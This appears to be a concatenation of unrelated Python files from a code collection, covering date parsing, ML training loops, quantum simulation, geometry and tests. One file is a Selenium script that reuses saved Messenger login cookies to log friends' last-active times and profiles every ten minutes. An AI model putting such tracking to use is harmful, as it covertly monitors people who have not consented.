TWENTY_SIX = Constant('twenty six', alias=["twentysix", "twenty-six"], value=26)
TWENTY_SEVEN = Constant('twenty seven', alias=["twentyseven", "twenty-seven"], value=27)
TWENTY_EIGHT = Constant('twenty eight', alias=["twentyeight", "twenty-eight"], value=28)
TWENTY_NINE = Constant('twenty nine', alias=["twentynine", "twenty-nine"], value=29)
THIRTY = Constant('thirty', value=30)
THIRTY_ONE = Constant('thirty one', alias=["thirtyone", "thirty-one"], value=31)
# Reversed to avoid conflicts with other constants (one is included in twenty one)
ALL = [ONE, TWO, THREE, FOUR, FIVE, SIX, SEVEN, EIGHT, NINE, TEN,
ELEVEN, TWELVE, THIRTEEN, FOURTEEN, FIFTEEN, SIXTEEN, SEVENTEEN, EIGHTEEN, NINETEEN, TWENTY,
TWENTY_ONE, TWENTY_TWO, TWENTY_THREE, TWENTY_FOUR, TWENTY_FIVE, TWENTY_SIX, TWENTY_SEVEN, TWENTY_EIGHT, TWENTY_NINE,
THIRTY, THIRTY_ONE][::-1]
class NumberCountConstants:
# Presented to you by github copilot
FIRST = Constant('first', alias=['1st', '1.'], value=1)
SECOND = Constant('second', alias=['2nd', '2.'], value=2)
THIRD = Constant('third', alias=['3rd', '3.'], value=3)
FOURTH = Constant('fourth', alias=['4th', '4.'], value=4)
FIFTH = Constant('fifth', alias=['5th', '5.'], value=5)
SIXTH = Constant('sixth', alias=['6th', '6.'], value=6)
SEVENTH = Constant('seventh', alias=['7th', '7.'], value=7)
EIGHTH = Constant('eighth', alias=['8th', '8.'], value=8)
NINTH = Constant('ninth', alias=['9th', '9.'], value=9)
TENTH = Constant('tenth', alias=['10th', '10.'], value=10)
ELEVENTH = Constant('eleventh', alias=['11th', '11.'], value=11)
TWELFTH = Constant('twelfth', alias=['12th', '12.'], value=12)
THIRTEENTH = Constant('thirteenth', alias=['13th', '13.'], value=13)
FOURTEENTH = Constant('fourteenth', alias=['14th', '14.'], value=14)
FIFTEENTH = Constant('fifteenth', alias=['15th', '15.'], value=15)
SIXTEENTH = Constant('sixteenth', alias=['16th', '16.'], value=16)
SEVENTEENTH = Constant('seventeenth', alias=['17th', '17.'], value=17)
EIGHTEENTH = Constant('eighteenth', alias=['18th', '18.'], value=18)
NINETEENTH = Constant('nineteenth', alias=['19th', '19.'], value=19)
TWENTIETH = Constant('twentieth', alias=['20th', '20.'], value=20)
TWENTY_FIRST = Constant('twenty first', alias=['21st', '21.', 'twentyfirst', 'twenty-first'], value=21)
TWENTY_SECOND = Constant('twenty second', alias=['22nd', '22.', 'twentysecond', 'twenty-second'], value=22)
TWENTY_THIRD = Constant('twenty third', alias=['23rd', '23.', 'twentythird', 'twenty-third'], value=23)
TWENTY_FOURTH = Constant('twenty fourth', alias=['24th', '24.', 'twentyfourth', 'twenty-fourth'], value=24)
TWENTY_FIFTH = Constant('twenty fifth', alias=['25th', '25.', 'twentyfifth', 'twenty-fifth'], value=25)
TWENTY_SIXTH = Constant('twenty sixth', alias=['26th', '26.', 'twentysixth', 'twenty-sixth'], value=26)
TWENTY_SEVENTH = Constant('twenty seventh', alias=['27th', '27.', 'twentyseventh', 'twenty-seventh'], value=27)
TWENTY_EIGHTH = Constant('twenty eighth', alias=['28th', '28.', 'twentyeighth', 'twenty-eighth'], value=28)
TWENTY_NINTH = Constant('twenty ninth', alias=['29th', '29.', 'twentyninth', 'twenty-ninth'], value=29)
THIRTIETH = Constant('thirtieth', alias=['30th', '30.'], value=30)
THIRTY_FIRST = Constant('thirty first', alias=['31st', '31.', 'thirthyfirst', "thirty-first"], value=31)
# Reversed to avoid conflicts with other constants
ALL = [FIRST, SECOND, THIRD, FOURTH, FIFTH, SIXTH, SEVENTH, EIGHTH, NINTH, TENTH,
ELEVENTH, TWELFTH, THIRTEENTH, FOURTEENTH, FIFTEENTH, SIXTEENTH, SEVENTEENTH, EIGHTEENTH, NINETEENTH, TWENTIETH,
TWENTY_FIRST, TWENTY_SECOND, TWENTY_THIRD, TWENTY_FOURTH, TWENTY_FIFTH, TWENTY_SIXTH, TWENTY_SEVENTH, TWENTY_EIGHTH,
TWENTY_NINTH,
THIRTIETH, THIRTY_FIRST][::-1]
class DatetimeConstants:
SECONDS = Constant('seconds', ['second', 'sec', 'secs'])
MINUTES = Constant('minutes', ['minute', 'min', 'mins'])
QUARTERS = Constant('quarters', ['quarter', 'qtr', 'qtrs'])
HOURS = Constant('hours', ['hour'])
DAYS = Constant('days', ['day'])
WEEKS = Constant('weeks', ['week'])
MONTHS = Constant('months', ['month'])
YEARS = Constant('years', ['year'])
OLYMPIADS = Constant('olympiads', ['olympiad']) # 4 years
DECADES = Constant('decades', ['decade']) # 10 years
CENTURIES = Constant('centuries', ['century']) # 100 years
MILLENNIUMS = Constant('millenniums', ['millennium']) # 1,000 years
MEGAANNUMS = Constant('megaannuums', ['megaannuum']) # 1,000,000 years
GIGAANNUMS = Constant('gigaannuums', ['gigaannuum']) # 1,000,000,000 years
TIME = [SECONDS, MINUTES, QUARTERS, HOURS]
DATE = [DAYS, WEEKS, MONTHS, YEARS, DECADES, CENTURIES, MILLENNIUMS, MEGAANNUMS, GIGAANNUMS]
ALL = [*DATE, *TIME]
@classmethod
def convert_from_mini_date(cls, md):
if md.lower() == "s":
return cls.SECONDS
elif md.lower() == "m":
return cls.MINUTES
elif md.lower() == "h":
return cls.HOURS
elif md.lower() == "w":
return cls.WEEKS
elif md.lower() == "d":
return cls.DAYS
elif md.lower() == "y":
return cls.YEARS
class WeekdayConstants:
MONDAY = Constant('monday', time_value=lambda date: f"{date + timedelta((0 - date.weekday()) % 7)}")
TUESDAY = Constant('tuesday', time_value=lambda date: f"{date + timedelta((1 - date.weekday()) % 7)}")
WEDNESDAY = Constant('wednesday', time_value=lambda date: f"{date + timedelta((2 - date.weekday()) % 7)}")
THURSDAY = Constant('thursday', time_value=lambda date: f"{date + timedelta((3 - date.weekday()) % 7)}")
FRIDAY = Constant('friday', time_value=lambda date: f"{date + timedelta((4 - date.weekday()) % 7)}")
SATURDAY = Constant('saturday', time_value=lambda date: f"{date + timedelta((5 - date.weekday()) % 7)}")
SUNDAY = Constant('sunday', time_value=lambda date: f"{date + timedelta((6 - date.weekday()) % 7)}")
ALL = [MONDAY, TUESDAY, WEDNESDAY, THURSDAY, FRIDAY, SATURDAY, SUNDAY]
class MonthConstants:
JANUARY = Constant('january', ['jan'], time_value=lambda year_time: datetime(year=year_time, month=1, day=1))
FEBRUARY = Constant('february', ['feb'], time_value=lambda year_time: datetime(year=year_time, month=2, day=1))
MARCH = Constant('march', ['mar'], time_value=lambda year_time: datetime(year=year_time, month=3, day=1))
APRIL = Constant('april', ['apr'], time_value=lambda year_time: datetime(year=year_time, month=4, day=1))
MAY = Constant('may', time_value=lambda year_time: datetime(year=year_time, month=5, day=1))
JUNE = Constant('june', ['jun'], time_value=lambda year_time: datetime(year=year_time, month=6, day=1))
JULY = Constant('july', ['jul'], time_value=lambda year_time: datetime(year=year_time, month=7, day=1))
AUGUST = Constant('august', ['aug'], time_value=lambda year_time: datetime(year=year_time, month=8, day=1))
SEPTEMBER = Constant('september', ['sep'], time_value=lambda year_time: datetime(year=year_time, month=9, day=1))
OCTOBER = Constant('october', ['oct'], time_value=lambda year_time: datetime(year=year_time, month=10, day=1))
NOVEMBER = Constant('november', ['nov'], time_value=lambda year_time: datetime(year=year_time, month=11, day=1))
DECEMBER = Constant('december', ['dec'], time_value=lambda year_time: datetime(year=year_time, month=12, day=1))
ALL = [JANUARY, FEBRUARY, MARCH, APRIL, MAY, JUNE, JULY, AUGUST, SEPTEMBER, OCTOBER, NOVEMBER, DECEMBER]
class Keywords:
OF = Constant('of')
AFTER = Constant('after')
BEFORE = Constant('before')
NEXT = Constant('next')
IN = Constant('in')
FOR = Constant('for')
PAST = Constant('past')
ALL = [OF, AFTER, BEFORE, NEXT, IN, FOR, PAST]
class Method:
ABSOLUTE_PREPOSITIONS = MethodEnum('absolute_prepositions')
ABSOLUTE_DATE_FORMATS = MethodEnum('absolute_date_formats')
CONSTANTS = MethodEnum('constants')
CONSTANTS_RELATIVE_EXTENSIONS = MethodEnum('constants_relative_extensions')
DATETIME_DELTA_CONSTANTS = MethodEnum('datetime_delta_constants')
RELATIVE_DATETIMES = MethodEnum('relative_datetimes')
|
23808
|
import torch
import random
from torch.utils.data import Dataset, DataLoader
from abc import ABC
from models.base_model import Model
from torch.utils.tensorboard import SummaryWriter
from typing import List
class BaseDataset(Dataset, ABC):
name = 'base'
def __init__(self, config: dict, mode: str = 'train'):
self.config = config
self.mode = mode
self.device = config['device']
self.data_dim = config['data_dim']
self.summary_name = self.name
'''
Note that dataset's __getitem__() returns (x_coord, x_feat, y_coord, y_feat, name)
But the collated batch returns type of (SparseTensorWrapper, SparseTensorWrapper)
'''
def __getitem__(self, idx) \
-> (torch.tensor, torch.tensor, torch.tensor, torch.tensor, List[str]):
# sparse tensor and tensor should have equal size
raise NotImplemented
def __iter__(self):
while True:
idx = random.randint(0, len(self) - 1)
yield self[idx]
def collate_fn(self, batch: List) -> dict:
# convert list of dict to dict of list
batch = {k: [d[k] for d in batch] for k in batch[0]}
return batch
def evaluate(self, model: Model, writer: SummaryWriter, step):
training = model.training
model.eval()
data_loader = DataLoader(
self,
batch_size=self.config['eval_batch_size'],
num_workers=self.config['num_workers'],
collate_fn=self.collate_fn,
drop_last=False,
)
print('')
eval_losses = []
for eval_step, data in enumerate(data_loader):
mode = self.mode
if len(self.config['eval_datasets']) != 1:
mode += '_' + self.summary_name
eval_loss = model.evaluate(data, step, mode)
eval_losses.append(eval_loss)
print('\r[Evaluating, Step {:7}, Loss {:5}]'.format(
eval_step, '%.3f' % eval_loss), end=''
)
print('')
model.write_dict_summaries(step)
model.train(training)
def test(self, model: Model, writer: SummaryWriter, step):
raise NotImplementedError()
def visualize(self, model: Model, options: List, step):
training = model.training
model.eval()
# fix vis_indices
vis_indices = self.config['vis']['indices']
if isinstance(vis_indices, int):
# sample data points from n data points with equal interval
n = len(self)
vis_indices = torch.linspace(0, n - 1, vis_indices).int().tolist()
# override to the index when in overfitting debug mode
if isinstance(self.config['overfit_one_ex'], int):
vis_indices = torch.tensor([self.config['overfit_one_ex']])
for option in options:
# calls the visualizing function
if hasattr(model, option):
getattr(model, option)(self, vis_indices, step)
else:
raise ValueError(
'model {} has no method {}'.format(
model.__class__.__name__, option
)
)
model.train(training)
def visualize_test(self, model: Model, writer: SummaryWriter, step):
training = model.training
model.eval()
# fix vis_indices
vis_indices = self.config['vis']['indices']
if isinstance(vis_indices, int):
# sample data points from n data points with equal interval
vis_indices = torch.linspace(0, len(self) - 1, vis_indices).int().tolist()
# override to the index when in overfitting debug mode
if isinstance(self.config['overfit_one_ex'], int):
vis_indices = torch.tensor([self.config['overfit_one_ex']])
model.visualize_test(self, vis_indices, step)
model.train(training)
|
23819
|
import random
from qlazy import QState
def classical_strategy(trials=1000):
win_cnt = 0
for _ in range(trials):
# random bits by Charlie (x,y)
x = random.randint(0,1)
y = random.randint(0,1)
# response by Alice (a)
a = 0
# response by Bob (b)
b = 0
# count up if win
if (x and y) == (a+b)%2:
win_cnt += 1
print("== result of classical strategy (trials:{0:d}) ==".format(trials))
print("* win prob. = ", win_cnt/trials)
def quantum_strategy(trials=1000):
win_cnt = 0
for _ in range(trials):
# random bits by Charlie (x,y)
x = random.randint(0,1)
y = random.randint(0,1)
# make entangled 2 qubits (one for Alice and another for Bob)
qs = QState(2).h(0).cx(0,1)
# response by Alice (a)
if x == 0:
# measurement of Z-basis (= Ry(0.0)-basis)
sa = qs.m([0], shots=1, angle=0.0, phase=0.0).lst
if sa == 0:
a = 0
else:
a = 1
else:
# measurement of X-basis (or Ry(0.5*PI)-basis)
sa = qs.mx([0], shots=1).lst
# sa = qs.m([0], shots=1, angle=0.5, phase=0.0).lst
if sa == 0:
a = 0
else:
a = 1
# response by Bob (b)
if y == 0:
# measurement of Ry(0.25*PI)-basis
sb = qs.m([1], shots=1, angle=0.25, phase=0.0).lst
if sb == 0:
b = 0
else:
b = 1
else:
# measurement of Ry(-0.25*PI)-basis
sb = qs.m([1], shots=1, angle=-0.25, phase=0.0).lst
if sb == 0:
b = 0
else:
b = 1
# count up if win
if (x and y) == (a+b)%2:
win_cnt += 1
print("== result of quantum strategy (trials:{0:d}) ==".format(trials))
print("* win prob. = ", win_cnt/trials)
if __name__ == '__main__':
classical_strategy()
quantum_strategy()
|
23822
|
from decimal import Decimal
def ensure_decimal(value):
return value if isinstance(value, Decimal) else Decimal(value)
|
23855
|
class Solution:
def bitwiseComplement(self, N: int, M = 0, m = 0) -> int:
return N ^ M if M and M >= N else self.bitwiseComplement(N, M + 2 ** m, m + 1)
|
23859
|
from .gradient_reversal import GradientReversal
from .noise import Noise, AdditiveNoise, MultiplicativeNoise
|
23884
|
import tensorflow as tf
import numpy as np
import math
# Parameter
order_num=2;
class Program:
def __init__(self,sess,state_dim,obj_num,fea_size,Theta,program_order,postfix):
self.sess = sess;
self.state_dim = state_dim;
self.fea_size=fea_size;
self.obj_num=obj_num;
self.order_num=order_num;
self.Theta=Theta;
self.program_order=program_order;
self.postfix=postfix;
self.p = self.compile_order();
def compile_order(self):
self.Theta=tf.reshape(self.Theta,[-1,self.obj_num,6]);
self.Theta=tf.transpose(self.Theta,perm=[0,2,1]);
self.Theta=tf.unstack(self.Theta,6,1);
# temporary ordering
p_1=tf.multiply(self.Theta[0],self.Theta[3]);
p_1=p_1+self.Theta[5];
p_2=tf.multiply(self.Theta[1],self.Theta[3]);
p_2=p_2+self.Theta[5];
p_3=tf.multiply(self.Theta[0],self.Theta[4]);
p_3=p_3+self.Theta[5];
p_4=tf.multiply(self.Theta[1],self.Theta[4]);
p_4=p_4+self.Theta[5];
program_order2=tf.unstack(self.program_order,(self.obj_num-1),1);
p=tf.multiply(tf.stack([program_order2[0]]*(self.obj_num),1),p_1)+tf.multiply(tf.stack([program_order2[1]]*(self.obj_num),1),p_2)+tf.multiply(tf.stack([program_order2[2]]*(self.obj_num),1),p_3)+tf.multiply(tf.stack([program_order2[3]]*(self.obj_num),1),p_4);
# Currently tf.cond makes problems
"""
program_order2=tf.unstack(self.program_order,self.order_num,1);
for i in range(self.order_num):
program_order2[i]=tf.unstack(program_order2[i],3,1);
for i in range(self.order_num):
for k in range(9):
for l in range(k+1,9):
# not=1, and=2, or=3
p=tf.cond(tf.equal(program_order2[i][0],1)&tf.equal(program_order2[i][1],k),lambda:1-self.Theta[k],lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],1)&tf.equal(program_order2[i][1],-1),lambda:1-p,lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],2)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:tf.multiply(self.Theta[k],self.Theta[l]),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],2)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],-1),lambda:tf.multiply(self.Theta[k],p),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],3)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:self.Theta[k]+self.Theta[l]-tf.multiply(self.Theta[k],self.Theta[l]),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],3)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:self.Theta[k]+p-tf.multiply(self.Theta[k],p),lambda:p);
"""
return p;
def run_target_nets(self,Theta,program_order):
Theta=tf.reshape(Theta,[-1,self.obj_num,6]);
Theta=tf.transpose(Theta,perm=[0,2,1]);
Theta=tf.unstack(Theta,6,1);
# temporary ordering
p_1=tf.multiply(Theta[0],Theta[3]);
p_1=p_1+Theta[5];
p_2=tf.multiply(Theta[1],Theta[3]);
p_2=p_2+Theta[5];
p_3=tf.multiply(Theta[0],Theta[4]);
p_3=p_3+Theta[5];
p_4=tf.multiply(Theta[1],Theta[4]);
p_4=p_4+Theta[5];
program_order2=tf.unstack(program_order,(self.obj_num-1),1);
p=tf.multiply(tf.stack([program_order2[0]]*(self.obj_num),1),p_1)+tf.multiply(tf.stack([program_order2[1]]*(self.obj_num),1),p_2)+tf.multiply(tf.stack([program_order2[2]]*(self.obj_num),1),p_3)+tf.multiply(tf.stack([program_order2[3]]*(self.obj_num),1),p_4);
# Currently tf.cond makes problems
"""
# Currently tf.cond makes problems
program_order2=tf.unstack(program_order,self.order_num,1);
for i in range(self.order_num):
program_order2[i]=tf.unstack(program_order2[i],3,1);
for i in range(self.order_num):
for k in range(9):
for l in range(k+1,9):
# not=1, and=2, or=3
p=tf.cond(tf.equal(program_order2[i][0],1)&tf.equal(program_order2[i][1],k),lambda:1-Theta[k],lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],1)&tf.equal(program_order2[i][1],-1),lambda:1-p,lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],2)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:tf.multiply(Theta[k],Theta[l]),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],2)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],-1),lambda:tf.multiply(Theta[k],p),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],3)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:Theta[k]+Theta[l]-tf.multiply(Theta[k],Theta[l]),lambda:p);
p=tf.cond(tf.equal(program_order2[i][0],3)&tf.equal(program_order2[i][1],k)&tf.equal(program_order2[i][2],l),lambda:Theta[k]+p-tf.multiply(Theta[k],p),lambda:p);
"""
return p;
|
23908
|
from numpy import exp, pi, cos, sin, tan
from ....Functions.Geometry.inter_line_circle import inter_line_circle
def _comp_point_coordinate(self):
"""Compute the point coordinates needed to plot the Slot.
Parameters
----------
self : HoleM51
A HoleM51 object
Returns
-------
point_dict: dict
A dict of the slot coordinates
"""
Rext = self.get_Rext()
# comp point coordinate (in complex)
alpha = self.comp_alpha()
Wslot = 2 * sin(self.W1 / 2) * (Rext - self.H1)
L = 0.5 * (Wslot - self.W0) / cos(alpha) # ||P2,P5||
# Center of the hole
Z0 = Rext - self.H0
Z2 = Z0 + 1j * self.W0 / 2
Z25 = Z0 - 1j * self.W0 / 2
Z15 = Z25 - self.H2
Z1 = Z2 - 1j * self.W2
Z26 = Z1 - 1j * self.W3
Z12 = Z2 - self.H2
Z13 = Z12 - 1j * self.W2
Z14 = Z13 - 1j * self.W3
Z11 = Z12 + 1j * tan(alpha / 2) * self.H2
Z16 = Z15 - 1j * tan(alpha / 2) * self.H2
# Draw the left side with center P2, and X axis =(P2,P5), Y axis=(P2,P10)
Z3 = self.W4 * exp(1j * (pi / 2 - alpha)) + Z2
Z4 = (self.W4 + self.W5) * exp(1j * (pi / 2 - alpha)) + Z2
Z5 = (Rext - self.H1) * exp(1j * self.W1 / 2)
Z10 = (1j * self.H2) * exp(1j * (pi / 2 - alpha)) + Z2
Z9 = (1j * self.H2 + self.W4) * exp(1j * (pi / 2 - alpha)) + Z2
Z8 = (1j * self.H2 + self.W4 + self.W5) * exp(1j * (pi / 2 - alpha)) + Z2
Z7 = (1j * self.H2 + L) * exp(1j * (pi / 2 - alpha)) + Z2
# Draw the right side with center P25, X axis (P25,P23), Y axis(P25,P17)
Z24 = self.W6 * exp(-1j * (pi / 2 - alpha)) + Z25
Z23 = (self.W6 + self.W7) * exp(-1j * (pi / 2 - alpha)) + Z25
Z22 = (Rext - self.H1) * exp(-1j * self.W1 / 2)
Z17 = (-1j * self.H2) * exp(-1j * (pi / 2 - alpha)) + Z25
Z18 = (-1j * self.H2 + self.W6) * exp(-1j * (pi / 2 - alpha)) + Z25
Z19 = (-1j * self.H2 + self.W6 + self.W7) * exp(-1j * (pi / 2 - alpha)) + Z25
Z20 = (-1j * self.H2 + L) * exp(-1j * (pi / 2 - alpha)) + Z25
# Z6 is the intersection of the line [Z7,Z10] and Circle centre
# (0,0) radius Rext - H1
Zint = inter_line_circle(Z7, Z10, Rext - self.H1)
# Select the point with Re(Z) > 0
if Zint[0].real > 0:
Z6 = Zint[0]
else:
Z6 = Zint[1]
Z21 = Z6.conjugate()
point_dict = dict()
point_dict["Z1"] = Z1
point_dict["Z2"] = Z2
point_dict["Z3"] = Z3
point_dict["Z4"] = Z4
point_dict["Z5"] = Z5
point_dict["Z6"] = Z6
point_dict["Z7"] = Z7
point_dict["Z8"] = Z8
point_dict["Z9"] = Z9
point_dict["Z10"] = Z10
point_dict["Z11"] = Z11
point_dict["Z12"] = Z12
point_dict["Z13"] = Z13
point_dict["Z14"] = Z14
point_dict["Z15"] = Z15
point_dict["Z16"] = Z16
point_dict["Z17"] = Z17
point_dict["Z18"] = Z18
point_dict["Z19"] = Z19
point_dict["Z20"] = Z20
point_dict["Z21"] = Z21
point_dict["Z22"] = Z22
point_dict["Z23"] = Z23
point_dict["Z24"] = Z24
point_dict["Z25"] = Z25
point_dict["Z26"] = Z26
return point_dict
|
23944
|
import FWCore.ParameterSet.Config as cms
HEBRecHitGPUtoSoAProd = cms.EDProducer('HEBRecHitGPUtoSoA',
HEBRecHitGPUTok = cms.InputTag('HEBRecHitGPUProd'))
|
23966
|
import os
import sys
from collections import defaultdict
import datetime
import pickle
import re
import time
import json
from selenium import webdriver
def main():
driver = webdriver.Chrome() # Optional argument, if not specified will search path.
#load login cookie
driver.get('https://www.messenger.com')
cookies=pickle.load(open('data/logincookies.pkl','rb'))
for c in cookies:
driver.add_cookie(c)
driver.get('https://www.messenger.com')
#get page source
source=(driver.page_source).encode('utf8','replace')
#get last active times and add them to database
v=re.compile("lastActiveTimes\":(.*),\"chatNotif")
lolo=json.loads(v.findall(source)[0])
d=defaultdict(lambda:[0],json.load(open("data/lastActiveTimes.json",'r')))
for k in lolo:
if lolo[k]!=d[k][-1]:
d[k].append(lolo[k])
json.dump(d,open("data/lastActiveTimes.json",'w'))
#maintain up to date database of friends profiles
v=re.compile("shortProfiles\":(.*),\"nearby")
lala=json.loads(v.findall(source)[0])
d=json.load(open('data/shortProfiles.json','r'))
d.update(lala)
json.dump(d,open('data/shortProfiles.json','w'))
driver.quit()
if not os.path.exists('data/logincookies.pkl'):
print ('missing cookie. Have you run init.py?')
sys.exit()
while True:
main()
with open('data/lastScrapeTime.txt','a') as f:
f.write(str(datetime.datetime.now())+'\n')
time.sleep(600)
|
24008
|
from app.classes.bot import Bot
from . import base_commands, base_events
def setup(bot: Bot):
base_commands.setup(bot)
base_events.setup(bot)
|
24009
|
import model
from model import whole_foods_sale
from model import aldis_au_sale
from model import aldis_us_sale
from model import aldis_uk_sale
def go(inputs, store_name):
if store_name == 'WholeFoods':
final_df = whole_foods_sale.items_on_sale()
elif store_name == 'Aldi AU':
final_df = aldis_au_sale.items_on_sale()
elif store_name == 'Aldi US':
final_df = aldis_us_sale.items_on_sale()
elif store_name == 'Aldi UK':
final_df = aldis_uk_sale.items_on_sale()
return final_df.to_html()
|
24030
|
from blueqat import Circuit, ParametrizedCircuit
def compare_circuit(c1: Circuit, c2: Circuit) -> bool:
return repr(c1) == repr(c2)
def test_parametrized1():
assert compare_circuit(
ParametrizedCircuit().ry('a')[0].rz('b')[0].subs([1.2, 3.4]),
Circuit().ry(1.2)[0].rz(3.4)[0])
def test_parametrized2():
assert compare_circuit(
ParametrizedCircuit().ry('a')[0].rz('b')[0].subs({'a': 1.2, 'b': 3.4}),
Circuit().ry(1.2)[0].rz(3.4)[0])
def test_parametrized3():
assert compare_circuit(
ParametrizedCircuit().subs([]),
Circuit()
)
|
24093
|
from encoder import Encoder
from decoder import Decoder
from parser import Parser
from baseline import *
from language_model import LanguageModel
from util import Reader
import dynet as dy
from misc import compute_eval_score, compute_perplexity
import os
initializers = {'glorot': dy.GlorotInitializer(),
'constant': dy.ConstInitializer(0.01),
'uniform': dy.UniformInitializer(0.1),
'normal': dy.NormalInitializer(mean = 0, var = 1)
}
optimizers = {
"sgd": dy.SimpleSGDTrainer,
"adam": dy.AdamTrainer,
"adadelta": dy.AdadeltaTrainer,
"adagrad": dy.AdagradTrainer
}
class Session(object):
def __init__(self, options):
self.reader = Reader(options.data_dir, options.data_augment)
self.options = options
def supervised_enc(self):
encoder = self.create_encoder()
if os.path.exists(self.options.result_dir + 'model_enc'):
self.load_encoder(encoder)
enc_trainer = optimizers[self.options.optimizer](encoder.model)
lr = self.options.lr #used only for sgd
i = 0
best_f1 = 0
print ('supervised training for encoder...')
for epoch in range(self.options.epochs):
sents = 0
total_loss = 0.0
train = self.reader.next_example(0)
train_size = len(self.reader.data[0])
for data in train:
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
loss = encoder.train(s1, s2, s3, pos, act, self.options.enc_dropout)
sents += 1
if loss is not None:
total_loss += loss.scalar_value()
loss.backward()
if self.options.optimizer == 'sgd':
enc_trainer.update(lr)
else:
enc_trainer.update()
e = float(i) / train_size
if i % self.options.print_every == 0:
print('epoch {}: loss per sentence: {}'.format(e, total_loss / sents))
sents = 0
total_loss = 0.0
if i!=0 and i % self.options.save_every == 0:
print('computing loss on validation set...')
valid = self.reader.next_example(2) #fix this
valid_size = len(self.reader.data[2])
rf = open(self.options.result_dir+'result', 'w')
for vdata in valid:
s1, s2, s3, pos, act = vdata[0], vdata[1], vdata[2], vdata[3], vdata[4]
_, output, _ = encoder.parse(s1, s2, s3, pos)
rf.write(output + '\n')
rf.close()
f1 = compute_eval_score(self.options.result_dir)
if f1 > best_f1:
best_f1 = f1
print ('highest f1: {}'.format(f1))
print ('saving model...')
encoder.Save(self.options.result_dir + 'model_enc')
else:
lr = lr * self.options.decay
i += 1
def supervised_dec(self):
decoder = self.create_decoder()
if os.path.exists(self.options.result_dir + 'model_dec'):
self.load_decoder(decoder)
dec_trainer = optimizers[self.options.optimizer](decoder.model)
lr = self.options.lr #used only for sgd
i = 0
lowest_valid_loss = 9999
print ('supervised training for decoder...')
for epoch in range(self.options.epochs):
sents = 0
total_loss = 0.0
train = self.reader.next_example(0)
train_size = len(self.reader.data[0])
for data in train:
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
loss, loss_act, loss_word = decoder.compute_loss(s3, act, self.options.dec_dropout)
sents += 1
if loss is not None:
total_loss += loss.scalar_value()
loss.backward()
if self.options.optimizer == 'sgd':
dec_trainer.update(lr)
else:
dec_trainer.update()
e = float(i) / train_size
if i % self.options.print_every == 0:
print('epoch {}: loss per sentence: {}'.format(e, total_loss / sents))
sents = 0
total_loss = 0.0
if i!=0 and i % self.options.save_every == 0:
print('computing loss on validation set...')
total_valid_loss = 0
valid = self.reader.next_example(1)
valid_size = len(self.reader.data[1])
for vdata in valid:
s1, s2, s3, pos, act = vdata[0], vdata[1], vdata[2], vdata[3], vdata[4]
valid_loss, _, _ = decoder.compute_loss(s3, act)
if valid_loss is not None:
total_valid_loss += valid_loss.scalar_value()
total_valid_loss = total_valid_loss * 1.0 / valid_size
if total_valid_loss < lowest_valid_loss:
lowest_valid_loss = total_valid_loss
print ('saving model...')
decoder.Save(self.options.result_dir + 'model_dec')
else:
lr = lr * self.options.decay
i += 1
def unsupervised_with_baseline(self):
decoder = self.create_decoder()
assert(os.path.exists(self.options.result_dir + 'model_dec'))
self.load_decoder(decoder)
encoder = self.create_encoder()
assert(os.path.exists(self.options.result_dir + 'model_enc'))
self.load_encoder(encoder)
baseline = self.create_baseline()
if os.path.exists(self.options.result_dir + 'baseline'):
self.load_baseline(baseline)
enc_trainer = optimizers[self.options.optimizer](encoder.model)
dec_trainer = optimizers[self.options.optimizer](decoder.model)
baseline_trainer = optimizers[self.options.optimizer](baseline.model)
lr = self.options.lr #used only for sgd
i = 0
lowest_valid_loss = 9999
print ('unsupervised training...')
for epoch in range(self.options.epochs):
sents = 0
total_loss = 0.0
train = self.reader.next_example(0)
train_size = len(self.reader.data[0])
for data in train:
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
sents += 1
# random sample
enc_loss_act, _, act = encoder.parse(s1, s2, s3, pos, sample=True)
_, dec_loss_act, dec_loss_word = decoder.compute_loss(s3, act)
# save reward
logpx = -dec_loss_word.scalar_value()
total_loss -= logpx
# reconstruction and regularization loss backprop to theta_d
dec_loss_total = dec_loss_word + dec_loss_act * dy.scalarInput(self.options.dec_reg)
dec_loss_total = dec_loss_total * dy.scalarInput(1.0 / self.options.mcsamples)
dec_loss_total.scalar_value()
dec_loss_total.backward()
# update decoder
if self.options.optimizer == 'sgd':
dec_trainer.update(lr)
else:
dec_trainer.update()
if self.options.enc_update > 0:
# compute baseline and backprop to theta_b
b = baseline(s3)
logpxb = b.scalar_value()
b_loss = dy.squared_distance(b, dy.scalarInput(logpx))
b_loss.value()
b_loss.backward()
# update baseline
if self.options.optimizer == 'sgd':
baseline_trainer.update(lr)
else:
baseline_trainer.update()
# policy and and regularization loss backprop to theta_e
enc_loss_act = encoder.train(s1, s2, s3, pos, act)
enc_loss_policy = enc_loss_act * dy.scalarInput((logpx - logpxb) / len(s1))
enc_loss_total = enc_loss_policy * dy.scalarInput(self.options.enc_update) - enc_loss_act * dy.scalarInput(self.options.enc_reg)
enc_loss_total = enc_loss_total * dy.scalarInput(1.0 / self.options.mcsamples)
enc_loss_total.value()
enc_loss_total.backward()
# update encoder
if self.options.optimizer == 'sgd':
enc_trainer.update(lr)
else:
enc_trainer.update()
e = float(i) / train_size
if i % self.options.print_every == 0:
print('epoch {}: loss per sentence: {}'.format(e, total_loss / sents))
sents = 0
total_loss = 0.0
if i!=0 and i % self.options.save_every == 0:
print('computing loss on validation set...')
total_valid_loss = 0
valid = self.reader.next_example(1)
valid_size = len(self.reader.data[1])
for vdata in valid:
s1, s2, s3, pos, act = vdata[0], vdata[1], vdata[2], vdata[3], vdata[4]
